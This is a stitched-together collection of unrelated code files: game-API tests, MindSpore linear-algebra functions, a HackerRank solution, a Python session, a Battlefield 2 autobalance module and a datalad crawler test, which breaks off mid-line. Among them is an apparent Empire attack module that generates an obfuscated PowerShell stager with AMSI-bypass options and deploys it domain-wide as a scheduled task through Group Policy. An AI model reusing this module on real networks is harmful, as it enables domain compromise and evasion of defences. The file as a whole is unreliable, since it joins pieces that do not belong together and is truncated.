Locale.en_US ) response = client.get_playable_classes_index() assert response == snapshot def test_get_playable_class(snapshot): client = WarcraftClient( os.getenv("CLIENT_ID"), os.getenv("CLIENT_SECRET"), Region.us, Locale.en_US ) response = client.get_playable_class(7) assert response == snapshot def test_get_playable_class_media(snapshot): client = WarcraftClient( os.getenv("CLIENT_ID"), os.getenv("CLIENT_SECRET"), Region.us, Locale.en_US ) response = client.get_playable_class_media(7) assert response == snapshot def test_get_pvp_talent_slots(snapshot): client = WarcraftClient( os.getenv("CLIENT_ID"), os.getenv("CLIENT_SECRET"), Region.us, Locale.en_US ) response = client.get_pvp_talent_slots(7) assert response == snapshot # Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Linear algebra submodule""" from .. import numpy as mnp from .. import ops from .ops import SolveTriangular from .ops import CholeskySolver from .ops import Cholesky from .ops import EighNet from ..ops import operations as P __all__ = ['block_diag', 'solve_triangular', 'inv', 'cho_factor', 'cholesky', 'cho_solve', 'eigh'] def block_diag(*arrs): """ Create a block diagonal matrix from provided arrays. Given the inputs `A`, `B` and `C`, the output will have these Tensor arranged on the diagonal:: [[A, 0, 0], [0, B, 0], [0, 0, C]] Args: A, B, C, ... (Tensor): up to 2-D Input Tensors. A 1-D Tensor or a 2-D Tensor with shape ``(1,n)``. Returns: D (Tesnor): Tensor with `A`, `B`, `C`, ... on the diagonal. `D` has the same dtype as `A`. Raises: ValueError: If there are tensors with dimensions higher than 2 in all arguments. Supported Platforms: ``CPU`` ``GPU`` Examples: >>> import numpy as onp >>> from mindspore.common import Tensor >>> from mindspore.scipy.linalg import block_diag >>> A = Tensor(onp.array([[1, 0], [0, 1]])) >>> B = Tensor(onp.array([[3, 4, 5], [6, 7, 8]])) >>> C = Tensor(onp.array([[7]])) >>> P = Tensor(onp.zeros((2, ), dtype='int32')) >>> block_diag(A, B, C) [[1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0], [0, 0, 3, 4, 5, 0], [0, 0, 6, 7, 8, 0], [0, 0, 0, 0, 0, 7]] >>> block_diag(A, P, B, C) [[1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 3, 4, 5, 0], [0, 0, 6, 7, 8, 0], [0, 0, 0, 0, 0, 7]] """ if not arrs: return mnp.zeros((1, 0)) bad_shapes = [i for i, a in enumerate(arrs) if a.ndim > 2] if bad_shapes: raise ValueError("Arguments to mindspore.scipy.linalg.block_diag must have at " "most 2 dimensions, got {} at argument {}." .format(arrs[bad_shapes[0]], bad_shapes[0])) arrs = [mnp.atleast_2d(a) for a in arrs] accum = arrs[0] for arr in arrs[1:]: _, c = arr.shape arr = ops.Pad(((0, 0), (accum.shape[-1], 0)))(arr) accum = ops.Pad(((0, 0), (0, c)))(accum) accum = mnp.concatenate([accum, arr], axis=0) return accum def solve_triangular(A, b, trans=0, lower=False, unit_diagonal=False, overwrite_b=False, debug=None, check_finite=True): """ Solve the equation `a x = b` for `x`, assuming a is a triangular matrix. Args: A (Tensor): A triangular matrix of shape :math:`(N, N)`. b (Tensor): A tensor of shape :math:`(M,)` or :math:`(M, N)`. Right-hand side matrix in :math:`A x = b`. lower (bool, optional): Use only data contained in the lower triangle of `a`. Default is to use upper triangle. trans (0, 1, 2, 'N', 'T', 'C', optional): Type of system to solve: ======== ========= trans system ======== ========= 0 or 'N' a x = b 1 or 'T' a^T x = b 2 or 'C' a^H x = b ======== ========= unit_diagonal (bool, optional): If True, diagonal elements of :math:`A` are assumed to be 1 and will not be referenced. overwrite_b (bool, optional): Allow overwriting data in :math:`b` (may enhance performance) check_finite (bool, optional): Whether to check that the input matrices contain only finite numbers. Disabling may give a performance gain, but may result in problems (crashes, non-termination) if the inputs do contain infinities or NaNs. Returns: x (Tensor): A tensor of shape :math:`(M,)` or :math:`(M, N)`, which is the solution to the system :math:`A x = b`. Shape of :math:`x` matches :math:`b`. Raises: LinAlgError: If :math:`A` is singular Supported Platforms: ``CPU`` ``GPU`` Examples: Solve the lower triangular system :math:`A x = b`, where: [3 0 0 0] [4] A = [2 1 0 0] b = [2] [1 0 1 0] [4] [1 1 1 1] [2] >>> import numpy as onp >>> from mindspore.common import Tensor >>> import mindspore.numpy as mnp >>> from mindspore.scipy.linalg import solve_triangular >>> A = Tensor(onp.array([[3, 0, 0, 0], [2, 1, 0, 0], [1, 0, 1, 0], [1, 1, 1, 1]], onp.float64)) >>> b = Tensor(onp.array([4, 2, 4, 2], onp.float64)) >>> x = solve_triangular(A, b, lower=True, unit_diagonal=False, trans='N') >>> x Tensor(shape=[4], dtype=Float32, value= [ 1.33333337e+00, -6.66666746e-01, 2.66666651e+00, -1.33333313e+00]) >>> mnp.dot(A, x) # Check the result Tensor(shape=[4], dtype=Float32, value= [ 4.00000000e+00, 2.00000000e+00, 4.00000000e+00, 2.00000000e+00]) """ if isinstance(trans, int): trans_table = ['N', 'T', 'C'] trans = trans_table[trans] solve = SolveTriangular(lower, unit_diagonal, trans) return solve(A, b) def inv(a, overwrite_a=False, check_finite=True): """ Compute the inverse of a matrix. Args: a (Tensor): Tensor Square matrix to be inverted. overwrite_a (bool, optional): Discard data in `a` (may improve performance). Default is False. check_finite (bool, optional): Whether to check that the input matrix contains only finite numbers. Disabling may give a performance gain, but may result in problems (crashes, non-termination) if the inputs do contain infinities or NaNs. Returns: ainv (Tensor): Inverse of the matrix `a`. Raises: LinAlgError: If `a` is singular. ValueError: If `a` is not square, or not 2D. Supported Platforms: ``CPU`` ``GPU`` Examples: >>> import numpy as onp >>> from mindspore.common import Tensor >>> import mindspore.numpy as mnp >>> from mindspore.scipy.linalg import inv >>> a = Tensor(onp.array([[1., 2.], [3., 4.]])) >>> inv(a) [[-2. , 1. ], [ 1.5, -0.5]] >>> mnp.dot(a, inv(a)) [[ 1., 0.], [ 0., 1.]] """ matrix_inverse = P.MatrixInverse(adjoint=False) return matrix_inverse(a) def cho_factor(a, lower=False, overwrite_a=False, check_finite=True): """ Compute the Cholesky decomposition of a matrix, to use in cho_solve Returns a matrix containing the Cholesky decomposition, ``A = L L*`` or ``A = U* U`` of a Hermitian positive-definite matrix `a`. The return value can be directly used as the first parameter to cho_solve. .. warning:: The returned matrix also contains random data in the entries not used by the Cholesky decomposition. If you need to zero these entries, use the function `cholesky` instead. Args: a (Tensor): square Matrix of (M, M) to be decomposed lower (bool, optional): Whether to compute the upper or lower triangular Cholesky factorization (Default: upper-triangular) overwrite_a(bool, optional): Whether to overwrite data in a (may improve performance) check_finite(bool, optional): Whether to check that the input matrix contains only finite numbers. Disabling may give a performance gain, but may result in problems (crashes, non-termination) if the inputs do contain infinities or NaNs. Returns: c (Tensor): Matrix whose upper or lower triangle contains the Cholesky factor of `a`. Other parts of the matrix contain random data. lower (bool, optional): Flag indicating whether the factor is in the lower or upper triangle Raises: LinAlgError: Raised if decomposition fails. Supported Platforms: ``CPU`` ``GPU`` Examples: >>> import numpy as onp >>> from mindspore.common import Tensor >>> from mindspore.scipy.linalg import cho_factor >>> A = Tensor(onp.array([[9, 3, 1, 5], [3, 7, 5, 1], [1, 5, 9, 2], [5, 1, 2, 6]]).astype(onp.float32)) >>> c, low = cho_factor(A) >>> c [[ 2.9999998 0.99999994 0.3333333 1.6666665 ] [ 0. 2.4494896 1.9051585 -0.27216542] [ 0. 0. 2.2933078 0.8559527 ] [ 0. 0. 0. 1.5541859 ]] """ cholesky_net = Cholesky(lower=lower, clean=False) c = cholesky_net(a) return c, lower def cholesky(a, lower=False, overwrite_a=False, check_finite=True): """ Compute the Cholesky decomposition of a matrix. Returns the Cholesky decomposition, :math:`A = L L^*` or :math:`A = U^* U` of a Hermitian positive-definite matrix A. Args: a (Tensor): square Matrix of (M, M) to be decomposed lower (bool, optional): Whether to compute the upper- or lower-triangular Cholesky factorization. Default is upper-triangular. overwrite_a (bool, optional): Whether to overwrite data in `a` (may improve performance). check_finite (bool, optional): Whether to check that the input matrix contains only finite numbers. Disabling may give a performance gain, but may result in problems (crashes, non-termination) if the inputs do contain infinities or NaNs. Returns: c (Tensor): Upper- or lower-triangular Cholesky factor of `a`. Raises: LinAlgError: if decomposition fails. Supported Platforms: ``CPU`` ``GPU`` Examples: >>> import numpy as onp >>> from mindspore.common import Tensor >>> from mindspore.scipy.linalg import cholesky >>> a = Tensor(onp.array([[1, -2],[2, 5]]).astype(onp.float32)) >>> L = cholesky(a, lower=True) >>> L [[1., 0.], [2., 1.]] """ cholesky_net = Cholesky(lower=lower, clean=True) c = cholesky_net(a) return c def cho_solve(c_and_lower, b, overwrite_b=False, check_finite=True): """Solve the linear equations Ax = b, given the Cholesky factorization of A. Args: c_and_lower ((Tensor, bool)): Cholesky factorization of a, as given by cho_factor b (Tensor): Right-hand side overwrite_b (bool, optional): Whether to overwrite data in b (may improve performance) check_finite (bool, optional): Whether to check that the input matrices contain only finite numbers. Disabling may give a performance gain, but may result in problems (crashes, non-termination) if the inputs do contain infinities or NaNs. Returns: x (Tensor): The solution to the system A x = b Supported Platforms: ``CPU`` ``GPU`` Examples: >>> import numpy as onp >>> from mindspore.common import Tensor >>> from mindspore.scipy.linalg import cho_factor, cho_solve >>> A = Tensor(onp.array([[9, 3, 1, 5], [3, 7, 5, 1], [1, 5, 9, 2], [5, 1, 2, 6]]).astype(onp.float32)) >>> b = Tensor(onp.array([1, 1, 1, 1]).astype(onp.float32)) >>> c, low = cho_factor(A) >>> x = cho_solve((c, low), b) >>> x [-0.01749271, 0.11953353, 0.01166181, 0.1574344 ] """ (c, lower) = c_and_lower cholesky_solver_net = CholeskySolver(lower=lower) x = cholesky_solver_net(c, b) return x def eigh(a, b=None, lower=True, eigvals_only=False, overwrite_a=False, overwrite_b=False, turbo=True, eigvals=None, _type=1, check_finite=True): """ Solve a standard or generalized eigenvalue problem for a complex Hermitian or real symmetric matrix. Find eigenvalues Tensor ``w`` and optionally eigenvectors Tensor ``v`` of Tensor ``a``, where ``b`` is positive definite such that for every eigenvalue λ (i-th entry of w) and its eigenvector ``vi`` (i-th column of ``v``) satisfies:: a @ vi = λ * b @ vi vi.conj().T @ a @ vi = λ vi.conj().T @ b @ vi = 1 In the standard problem, ``b`` is assumed to be the identity matrix. Args: a (Tensor): (M, M) Tensor A complex Hermitian or real symmetric matrix whose eigenvalues and eigenvectors will be computed. b (Tensor, optional): (M, M) Tensor A complex Hermitian or real symmetric definite positive matrix in. If omitted, identity matrix is assumed. lower (bool, optional): Whether the pertinent Tensor data is taken from the lower or upper triangle of ``a`` and, if applicable, ``b``. (Default: lower) eigvals_only (bool, optional): Whether to calculate only eigenvalues and no eigenvectors. (Default: both are calculated) _type (int, optional): For the generalized problems, this keyword specifies the problem type to be solved for ``w`` and ``v`` (only takes 1, 2, 3 as possible inputs):: 1 => a @ v = w @ b @ v 2 => a @ b @ v = w @ v 3 => b @ a @ v = w @ v This keyword is ignored for standard problems. overwrite_a (bool, optional): Whether to overwrite data in ``a`` (may improve performance). Default is False. overwrite_b (bool, optional): Whether to overwrite data in ``b`` (may improve performance). Default is False. check_finite (bool, optional): Whether to check that the input matrices contain only finite numbers. Disabling may give a performance gain, but may result in problems (crashes, non-termination) if the inputs do contain infinities or NaNs. turbo (bool, optional): use divide and conquer algorithm (faster but expensive in memory, only for generalized eigenvalue problem and if full set of eigenvalues are requested.). Has no significant effect if eigenvectors are not requested. eigvals (tuple, optional): Indexes of the smallest and largest (in ascending order) eigenvalues and corresponding eigenvectors to be returned: 0 <= lo <= hi <= M-1. If omitted, all eigenvalues and eigenvectors are returned. Returns: w (Tensor): (N,) Tensor, The N (1<=N<=M) selected eigenvalues, in ascending order, each repeated according to its multiplicity. v (Tensor): (M, N) Tensor, (if ``eigvals_only == False``) Raises: LinAlgError: If eigenvalue computation does not converge, an error occurred, or b matrix is not definite positive. Note that if input matrices are not symmetric or Hermitian, no error will be reported but results will be wrong. Supported Platforms: ``CPU`` ``GPU`` Examples: >>> import numpy as onp >>> from mindspore.common import Tensor >>> from mindspore.scipy.linalg import eigh >>> A = Tensor(onp.array([[6, 3, 1, 5], [3, 0, 5, 1], [1, 5, 6, 2], [5, 1, 2, 2]])) >>> w, v = eigh(A) >>> onp.allclose(A @ v - v @ onp.diag(w), onp.zeros((4, 4))) True """ eigh_net = EighNet(not eigvals_only, lower=True) return eigh_net(a) hugolribeiro/hackerrank_exercises # Complete the hourglassSum function below. # Programmer: def hourglassSum(arr): hourglasses_sum = [] for line in range(1, 5): for column in range(1, 5): hourglass_sum = arr[line-1][column-1] + arr[line-1][column] + arr[line-1][column+1] + arr[line][column] + \ arr[line+1][column-1] + arr[line+1][column] + arr[line+1][column+1] hourglasses_sum.append(hourglass_sum) return max(hourglasses_sum) Python 2.7.10 (default, May 23 2015, 09:44:00) [MSC v.1500 64 bit (AMD64)] on win32 Type "copyright", "credits" or "license()" for more information. >>> import csv >>> def loadCsv(filename): lines = csv.reader(open(filename, "rb")) dataset = list(lines) for i in range(len(dataset)): dataset[i] = [float(x) for x in dataset[i]] return dataset >>> filename = 'G:/CODEWORK/bayes_classification.csv' >>> dataset = loadCsv(filename) >>> print('Loaded data file {0} with {1} rows').format(filename, len(dataset)) Loaded data file G:/CODEWORK/bayes_classification.csv with 768 rows >>> from __future__ import print_function from builtins import object from builtins import str from lib.common import helpers class Module(object): def __init__(self, mainMenu, params=[]): self.info = { 'Name': 'New-GPOImmediateTask', 'Author': ['@harmj0y'], 'Description': ("Builds an 'Immediate' schtask to push out through a specified GPO."), 'Software': 'S0111', 'Techniques': ['T1053'], 'Background': True, 'OutputExtension': None, 'NeedsAdmin': False, 'OpsecSafe': True, 'Language': 'powershell', 'MinLanguageVersion': '2', 'Comments': [ 'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/' ] } # any options needed by the module, settable during runtime self.options = { # format: # value_name : {description, required, default_value} 'Agent': { 'Description': 'Agent to run module on.', 'Required': True, 'Value': '' }, 'TaskName': { 'Description': 'Name for the schtask to create.', 'Required': True, 'Value': 'Debug' }, 'TaskDescription': { 'Description': 'Name for the schtask to create.', 'Required': False, 'Value': 'Debugging functionality.' }, 'TaskAuthor': { 'Description': 'Name for the schtask to create.', 'Required': True, 'Value': 'NT AUTHORITY\System' }, 'GPOname': { 'Description': 'The GPO name to build the task for.', 'Required': False, 'Value': '' }, 'GPODisplayName': { 'Description': 'The GPO display name to build the task for.', 'Required': False, 'Value': '' }, 'Domain': { 'Description': 'The domain to query for the GPOs, defaults to the current domain.', 'Required': False, 'Value': '' }, 'DomainController': { 'Description': 'Domain controller to reflect LDAP queries through.', 'Required': False, 'Value': '' }, 'Listener': { 'Description': 'Listener to use.', 'Required': True, 'Value': '' }, 'UserAgent': { 'Description': 'User-agent string to use for the staging request (default, none, or other).', 'Required': False, 'Value': 'default' }, 'Proxy': { 'Description': 'Proxy to use for request (default, none, or other).', 'Required': False, 'Value': 'default' }, 'ProxyCreds': { 'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).', 'Required': False, 'Value': 'default' }, 'Remove': { 'Description': 'Switch. Remove the immediate schtask.', 'Required': False, 'Value': 'default' }, 'Obfuscate': { 'Description': 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.', 'Required': False, 'Value': 'False' }, 'ObfuscateCommand': { 'Description': 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.', 'Required': False, 'Value': r'Token\All\1' }, 'AMSIBypass': { 'Description': 'Include mattifestation\'s AMSI Bypass in the stager code.', 'Required': False, 'Value': 'True' }, 'AMSIBypass2': { 'Description': 'Include Tal Liberman\'s AMSI Bypass in the stager code.', 'Required': False, 'Value': 'False' } } # save off a copy of the mainMenu object to access external functionality # like listeners/agent handlers/etc. self.mainMenu = mainMenu for param in params: # parameter format is [Name, Value] option, value = param if option in self.options: self.options[option]['Value'] = value def generate(self, obfuscate=False, obfuscationCommand=""): # Set booleans to false by default Obfuscate = False AMSIBypass = False AMSIBypass2 = False module_name = self.info["Name"] listener_name = self.options['Listener']['Value'] user_agent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxy_creds = self.options['ProxyCreds']['Value'] if (self.options['Obfuscate']['Value']).lower() == 'true': Obfuscate = True ObfuscateCommand = self.options['ObfuscateCommand']['Value'] if (self.options['AMSIBypass']['Value']).lower() == 'true': AMSIBypass = True if (self.options['AMSIBypass2']['Value']).lower() == 'true': AMSIBypass2 = True if not self.mainMenu.listeners.is_listener_valid(listener_name): # not a valid listener, return nothing for the script print(helpers.color("[!] Invalid listener: " + listener_name)) return "" else: # generate the PowerShell one-liner with all of the proper options set launcher = self.mainMenu.stagers.generate_launcher(listener_name, language='powershell', encode=True, obfuscate=Obfuscate, obfuscationCommand=ObfuscateCommand, userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds, AMSIBypass=AMSIBypass, AMSIBypass2=AMSIBypass2) command = "/c \"" + launcher + "\"" if command == "": return "" else: # read in the common powerview.ps1 module source code module_source = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1" try: f = open(module_source, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(module_source))) return "" module_code = f.read() f.close() # get just the code needed for the specified function script = helpers.generate_dynamic_powershell_script(module_code, module_name) script = module_name + " -Command cmd -CommandArguments '" + command + "' -Force" for option, values in self.options.items(): if option.lower() in ["taskname", "taskdescription", "taskauthor", "gponame", "gpodisplayname", "domain", "domaincontroller"]: if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch script += " -" + str(option) else: script += " -" + str(option) + " '" + str(values['Value']) + "'" script += ' | Out-String | %{$_ + \"`n\"};"`n' + str(module_name) + ' completed!"' if obfuscate: script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) script = helpers.keyword_obfuscation(script) return script Dankr4d/modmanager # vim: ts=4 sw=4 noexpandtab """ Team autobalance system. This is a autobalance system ModManager module ===== Config ===== # Allow Commander if 0 then we never autobalance the commander mm_autobalance.allowCommander 0 # Allow Squad Leader if 0 then we only autobalance squad leaders # if they are the only member of that squad mm_autobalance.allowSquadLeader 0 # Allow Squad Member if 0 then we only autobalance squad members # if there are only squad members, squad leaders and commander on the team mm_autobalance.allowSquadMember 0 # Allows plays to be switched teams at the end of a round # 0 => No swap # 1 => Swap teams # 2 => Randomise teams mm_autobalance.roundSwitch ===== History ===== v2.5 - 12/10/2011: Fixed being able to load on Heroes v2.4 - 12/10/2011: Added BFP4F Support v2.3 - 14/07/2009: Disabled this module for Heroes as its never valid due to the fixed player classes v2.2 - 07/10/2006: Fixed off by one issue on player connect v2.1 - 03/10/2006: Merged with ClanMatch and enhanced to have multiple on round change methods v2.0 - 13/09/2006: Enhancements / fixes merged from BF2142 Closed BETA 2 v1.9 - 30/08/2006: Added supported games Included changes from BF2142 Tuning BETA 2 v1.8 - 13/07/2006 Added gpm_coop checks from v1.4 patch v1.7 - 20/05/2006: Added gpm_coop check from v1.3 patch v1.6 - 08/08/2005: Fix for player joining during pre / post game not being balanced correctly. v1.5 - 03/08/2005: Optimised onPlayerConnect team check v1.4 - 21/07/2005: Flagged as reload safe v1.3 - 13/07/2005: Enhanced squad based autobalance descision making to take into account team composition. v1.2 - 09/07/2005: Added commander, and squad balance options v1.1 - 30/06/2005: Updated to ModManager format by v1.0: Created by: DICE """ import bf2 import host import random import mm_utils __version__ = 2.5 __required_modules__ = { 'modmanager': 1.6 } __supports_reload__ = True __supported_games__ = { 'bf2': True, 'bf2142': True, 'bfheroes': False, 'bfp4f': True } __description__ = "ModManager Team autobalance v%s" % __version__ configDefaults = { 'allowCommander': 0, 'allowSquadLeader': 0, 'allowSquadMember': 0, 'roundSwitch': 0, } class AutoBalance( object ): def __init__( self, modManager ): self.mm = modManager self.__state = 0 def onPlayerConnect( self, p ): """Autobalance the new player if required.""" if 1 != self.__state: return if self.mm.isBattleField2142() and not p.isValid(): return # dont team switch alive players, or they will have the wrong teams kit if p.isAlive(): return # place player on the team with least players team1 = 0 team2 = 0 for tp in bf2.playerManager.getPlayers(): if 1 == tp.getTeam(): team1 += 1 else: team2 += 1 # Ignore the new player's team entry # N.B. Doing it this way avoids a loop level check if 1 == p.getTeam(): team1 -= 1 else: team2 -= 1 if ( team2 * bf2.serverSettings.getTeamRatioPercent() / 100.0 ) > team1: p.setTeam(1) else: p.setTeam(2) def onPlayerDeath( self, p, vehicle ): """Autobalance a player that has died if required and allowed by the balance rules.""" if 1 != self.__state: return if p == None: return if self.mm.isBattleField2142(): # bf2142 specific if not p.isValid() or p.isAutoController(): return else: # bf2 specific if ( host.ss_getParam('gameMode') == "gpm_coop") and p.isAIPlayer(): return if not bf2.serverSettings.getAutoBalanceTeam(): return # dont use autobalance when its suicide/changes team if p.getSuicide(): p.setSuicide(0) return if ( not self.__config['allowCommander'] ) and p.isCommander(): # dont autobalance the commander return squadid = p.getSquadId() teamid = p.getTeam() players = bf2.playerManager.getPlayers() if ( not self.__config['allowSquadLeader'] ) and p.isSquadLeader(): # only autobalance the squad leader if they are the only # member of that squad squad_members = 0 for tp in players: if squadid == tp.getSquadId() and tp.index != p.index: # we have other members in this squad dont autobalance #self.mm.debug( 2, "AB: no ( squad leader with members )" ) return if ( not self.__config['allowSquadMember'] ) and ( squadid > 0 ): # only autobalance squad members if there are no none # squad members / commander on this team basic_players = 0 for tp in players: if tp.getTeam() != teamid: continue if tp.getSquadId() > 0: continue if tp.isCommander(): continue if host.sgl_getIsAIGame() and not tp.isAIPlayer(): continue # none squad member / commander of this team basic_players += 1 if 0 != basic_players: # we have basic players in this team we # will balance them instead #self.mm.debug( 2, "AB: no ( basic players avail )" ) return aiPlayerBalance = 0 team1 = 0 team2 = 0 for tp in players: if tp.getTeam() == 1: team1 += 1 else: team2 += 1 if tp.isAIPlayer(): aiPlayerBalance += 1 else: aiPlayerBalance -= 1 if host.sgl_getIsAIGame(): if self.mm.isBattleField2142() or not (host.ss_getParam('gameMode') == "gpm_coop"): if not (aiPlayerBalance < 0): if not p.isAIPlayer(): return team2 = team2 * bf2.serverSettings.getTeamRatioPercent() / 100.0 if ( teamid == 1 ): if ( team2 + 1 ) < team1: #self.mm.debug( 2, "AB: player '%s' -> team %d" % ( p.getName(), 2 ) ) p.setTeam( 2 ) elif ( teamid == 2 ): if ( team1 + 1 ) < team2: #self.mm.debug( 2, "AB: player '%s' -> team %d" % ( p.getName(), 1 ) ) p.setTeam( 1 ) def onPlayerChangeTeams( self, p, humanHasSpawned ): """Ensure the player isnt unbalancing the teams.""" if 1 != self.__state: return self.mm.debug( 2, "AB: change" ) if not bf2.serverSettings.getAutoBalanceTeam(): return # dont teamswitch alive players, or they will have the wrong teams kit if p.isAlive(): return if host.sgl_getIsAIGame() and ( self.mm.isBattleField2142() or not ( host.ss_getParam('gameMode') == "gpm_coop" ) ): if humanHasSpawned or p.isAIPlayer(): return # handling aiplayer team change autobalance when round not started team = p.getTeam() aiplayer = 0 for tp in bf2.playerManager.getPlayers(): if aiplayer == 0 and tp.getTeam() == team and tp.isAIPlayer(): aiplayer = tp break if aiplayer: if p.getTeam() == 1: aiplayer.setTeam(2) else: aiplayer.setTeam(1) else: # checking to see if player is allowed to change teams team1 = 0 team2 = 0 for tp in bf2.playerManager.getPlayers(): if tp.getTeam() == 1: team1 += 1 else: team2 += 1 if abs(team1 - team2) > 1: if p.getTeam() == 1: p.setTeam(2) else: p.setTeam(1) def onGameStatusChanged( self, status ): """Make a note of the game status""" """Switch players to the other team if end of round""" if 0 != self.__config['roundSwitch'] and bf2.GameStatus.PreGame == status and bf2.GameStatus.EndGame == self.mm.lastGameStatus: # End of round so swap players if 1 == self.__config['roundSwitch']: # Straight swap for player in bf2.playerManager.getPlayers(): # avoid autobalance changing us back player.setSuicide( 1 ) # Change their team if 1 == player.getTeam(): player.setTeam( 2 ) else: player.setTeam( 1 ) elif 2 == self.__config['roundSwitch']: # Randomise random.seed(); players = bf2.playerManager.getPlayers() random.shuffle( players ) i = 1 half = int( len( players ) / 2 ); for player in players: # avoid autobalance changing us back player.setSuicide( 1 ) # Change their team if i <= half: player.setTeam( 1 ) else: player.setTeam( 2 ) i += 1 def init( self ): """Provides default initialisation.""" self.__config = self.mm.getModuleConfig( configDefaults ) # Register our game handlers if 0 == self.__state: host.registerHandler( 'PlayerConnect', self.onPlayerConnect, 1 ) host.registerHandler( 'PlayerDeath', self.onPlayerDeath, 1 ) host.registerHandler( 'PlayerChangeTeams', self.onPlayerChangeTeams, 1 ) # Register your game handlers and provide any # other dynamic initialisation here host.registerGameStatusHandler( self.onGameStatusChanged ) self.__state = 1 def shutdown( self ): """Shutdown and stop processing.""" # Unregister game handlers and do any other # other actions to ensure your module no longer affects # the game in anyway host.unregisterGameStatusHandler( self.onGameStatusChanged ) # Flag as shutdown as there is currently way to do this self.__state = 2 def mm_load( modManager ): """Creates the auto balance object.""" return AutoBalance( modManager ) # emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*- # ex: set sts=4 ts=4 sw=4 noet: # ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ## # # See COPYING file distributed along with the datalad package for the # copyright and license terms. # # ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ## from datalad.tests.utils import known_failure_v6 from datalad.tests.utils import known_failure_direct_mode from datalad_crawler.pipelines.tests.utils import _test_smoke_pipelines from ..balsa import pipeline as ofpipeline, superdataset_pipeline import os import logging from os.path import exists from glob import glob from os.path import join as opj from mock import patch from ...nodes.crawl_url import crawl_url from ...nodes.matches import * from ...pipeline import run_pipeline, FinishPipeline from ...nodes.misc import Sink, assign, range_node, interrupt_if from ...nodes.annex import Annexificator, initiate_dataset from ...pipeline import load_pipeline_from_module from datalad.support.stats import ActivityStats from datalad.support.gitrepo import GitRepo from datalad.support.annexrepo import AnnexRepo from datalad.utils import chpwd from datalad.utils import find_files from datalad.utils import swallow_logs from datalad.tests.utils import with_tree from datalad.tests.utils import SkipTest from datalad.tests.utils import eq_, assert_not_equal, ok_, assert_raises from datalad.tests.utils import assert_in, assert_not_in, assert_true from datalad.tests.utils import skip_if_no_module from datalad.tests.utils import with_tempfile from datalad.tests.utils import serve_path_via_http from datalad.tests.utils import skip_if_no_network from datalad.tests.utils import use_cassette from datalad.tests.utils import ok_file_has_content from datalad.tests.utils import ok_file_under_git from logging import getLogger lgr = getLogger('datalad.crawl.tests') def test_smoke_pipelines(): yield _test_smoke_pipelines, superdataset_pipeline, [] TEST_TREE1 = { 'study': { 'show': { 'WG33': { 'index.html': """

    SPECIES:
    Human

    DESCRIPTION:
    DC Van Essen, , MF Glasser (2016) PMID: 27074495

    PUBLICATION:
    NeuroImage

    AUTHORS:
    • DC Van Essen
    • er
    """ }, }, 'download': { 'WG33.tar.gz': { 'file1.nii': "content of file1.nii", 'dir1': { 'file2.nii': "content of file2.nii", } } } }, 'file': { 'show': { 'JX5V': { 'index.html': """ Download (120 MB) """ }, 'R1BX': { 'index.html': """ Download (26 MB) """ } }, 'download': { 'file1.nii': "content of file1.nii", 'dir1': { 'file2.nii': "content of file2.nii", } } }, } @with_tree(tree=TEST_TREE1, archives_leading_dir=False) @serve_path_via_http @with_tempfile @with_tempfile @known_failure_direct_mode #FIXME @known_failure_v6 #FIXME def test_balsa_extract_meta(ind, topurl, outd, clonedir): list(initiate_dataset( template="balsa", dataset_name='dataladtest-WG33', path=outd, data_fields=['dataset_id'])({'dataset_id': 'WG33'})) with chpwd(outd): pipeline = ofpipeline('WG33', url=topurl) out = run_pipeline(pipeline) eq_(len(out), 1) with chpwd(outd): assert_true(exists(".datalad/meta/balsa.json")) f = open(".datalad/meta/balsa.json", 'r') contents = f.read() assert_true("SPECIES" and "DESCRIPTION" and "PUBLICATION" and "AUTHORS" in contents) _PLUG_HERE = '' @with_tree(tree={ 'study': { 'show': { 'WG33': { 'index.html': """ Download (146 MB) file1.nii dir1 / file2.nii %s """ % _PLUG_HERE, }, }, 'download': { 'WG33.tar.gz': { 'file1.nii': "content of file1.nii", 'dir1': { 'file2.nii': "content of file2.nii", } } } }, 'file': { 'show': { 'JX5V': { 'index.html': """ Download (120 MB) """ }, 'R1BX': { 'index.html': """ Download (26 MB) """ } }, 'download': { 'file1.nii': "content of file1.nii", 'dir1': { 'file2.nii': "content of file2.nii", } } }, }, archives_leading_dir=False ) @serve_path_via_http @with_tempfile @with_tempfile @known_failure_direct_mode #FIXME @known_failure_v6 #FIXME def test_balsa_pipeline1(ind, topurl, outd, clonedir): list(initiate_dataset( template="balsa", dataset_name='dataladtest-WG33', path=outd, data_fields=['dataset_id'])({'dataset_id': 'WG33'})) with chpwd(outd): pipeline = ofpipeline('WG33', url=topurl) out = run_pipeline(pipeline) eq_(len(out), 1) repo = AnnexRepo(outd, create=False) # to be used in the checks # Inspect the tree -- that we have all the branches branches = {'master', 'incoming', 'incoming-processed', 'git-annex'} eq_(set(repo.get_branches()), branches) # since now we base incoming on master -- and there were nothing custom # in master after incoming-processed, both branches should be the same eq_(repo.get_hexsha('master'), repo.get_hexsha('incoming-processed')) # but that one is different from incoming assert_not_equal(repo.get_hexsha('incoming'), repo.get_hexsha('incoming-processed')) commits = {b: list(repo.get_branch_commits(b)) for b in branches} eq_(len(commits['incoming']), 1 + 3) # +3 since now 